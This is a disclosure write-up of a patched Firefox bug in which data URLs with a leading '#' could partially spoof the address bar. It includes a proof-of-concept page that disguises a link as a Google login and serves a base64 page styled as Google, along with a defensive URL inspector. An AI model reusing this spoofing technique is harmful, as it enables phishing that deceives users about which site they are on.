Firefox Partial URL Spoof Using Data URL Scheme (FIXED)


In Firefox, there is an interesting behavior I noticed when combining data URLs with the hash symbol. The useful property of the hash symbol (the fragment) is that changing it (i.e. changing location.hash) does not reload the page, and this applies to data URLs as well.

Let's look at how Firefox used to handle data URLs with hash symbol changes:
First, I noticed that navigating to 'data:#text/html,<b>Hello</b>' (note the invalid content type: everything after the '#' should be a fragment, so the URL has no valid media type or body) still rendered as HTML (now fixed). If we then set location.hash to '//mozilla.org', the address bar changes to 'data:#//mozilla.org' without the document changing, successfully achieving a partial URL spoof.

Original PoC code:


<!DOCTYPE html>
<html>
 <head>
  <title>Firefox social engineering, partial url spoof PoC</title>
 </head>
 <body>
  Click-> <a id="qab" target="_blank" rel="prefetch nofollow noreferrer" href="https://secure.google.com/login">https://secure.google.com/login</a> <-

  <script>
   // On click, swap the visible https:// href for a data: URL whose content sits behind the '#'.
   // The anchor is referenced through its id, which browsers expose as a global.
   qab.addEventListener("click", $ => {
    qab.href = 'data:#;text/html;base64,PGh0bWw+PGhlYWQgcHJvZmlsZT0iaHR0cDovL3d3dy53My5vcmcvMjAwNS8xMC9wcm9maWxlIj48bGluayByZWw9Imljb24iIHR5cGU9ImltYWdlL3BuZyIgaHJlZj0iaHR0cDovL3d3dy5nb29nbGUuY29tL2Zhdmljb24uaWNvIj48dGl0bGU+R29vZ2xlPC90aXRsZT48L2hlYWQ+PGJvZHk+PGI+c2VlbXMgbGVnaXQ8L2I+PHNjcmlwdD5sb2NhdGlvbi5oYXNoPScvL3NlY3VyZS5nb29nbGUuY29tL2xvZ2luJzs8L3NjcmlwdD48L2JvZHk+PC9odG1sPg==';
    // Base64 is used to ensure the hashtag in the content is not parsed.
   });
  </script>
 </body>
</html>
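
Added example (not part of the original PoC): a small inspector built on Node's WHATWG-compliant URL parser, showing how a spec-conformant parser splits data: URLs of the shape used above. Everything after the first '#' is the fragment, so for 'data:#;text/html;base64,...' the body is empty and the payload lives in the fragment, which is what a scanner or proxy can flag. The sample URLs are constructed; their base64 decodes to '<b>Hello</b>'.

```javascript
// Inspect a data: URL with a spec-conformant parser (Node's WHATWG URL class).
// Per RFC 2397 and the URL Standard the first '#' ends the body, so anything
// after it is a fragment, not content. The result reports where the payload
// actually sits so URLs relying on the old Firefox parsing can be flagged.
function inspectDataUrl(input) {
  const url = new URL(input);                       // throws on unparseable input
  if (url.protocol !== 'data:') return { isData: false };

  // url.pathname holds "<mediatype>[;base64],<data>" with the fragment removed.
  const body = url.pathname;
  const comma = body.indexOf(',');
  const header = comma === -1 ? body : body.slice(0, comma);
  const rawData = comma === -1 ? '' : body.slice(comma + 1);

  const params = header.split(';');
  const mediaType = params[0].toLowerCase();
  const isBase64 = params.slice(1).some(p => p.toLowerCase() === 'base64');
  const validMediaType = mediaType === '' || /^[\w.+-]+\/[\w.+-]+$/.test(mediaType);

  // Decode the body: base64 via Buffer (Node), otherwise percent-decoding.
  let decoded;
  try {
    decoded = isBase64
      ? Buffer.from(rawData, 'base64').toString('utf8')
      : decodeURIComponent(rawData);
  } catch {
    decoded = null;                                 // malformed percent-encoding
  }

  return {
    isData: true,
    mediaType,
    isBase64,
    validMediaType,
    decoded,
    fragment: url.hash,
    // No comma before the fragment but one inside it: the "content" is in the
    // fragment, which is exactly the data:#... shape described on this page.
    bodyInFragment: comma === -1 && url.hash.includes(','),
    // A fragment starting with "//host" is what appeared in the address bar
    // as a fake authority after the location.hash change.
    fragmentLooksLikeAuthority: /^#\/\/[^\/]/.test(url.hash),
  };
}

// Constructed samples: "PGI+SGVsbG88L2I+" is base64 for "<b>Hello</b>".
const SAMPLES = [
  'data:text/html;base64,PGI+SGVsbG88L2I+',         // well-formed
  'data:#;text/html;base64,PGI+SGVsbG88L2I+',       // body hidden behind '#'
  'data:text/plain,hello#//mozilla.org',            // fragment shaped like an authority
];

function report() {
  return SAMPLES.map(u => ({ url: u, ...inspectDataUrl(u) }));
}
```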


References:

The Bugzilla report: https://bugzilla.mozilla.org/show_bug.cgi?id=1221444
Mozilla Foundation Security Advisory 2015-141: https://www.mozilla.org/en-US/security/advisories/mfsa2015-141/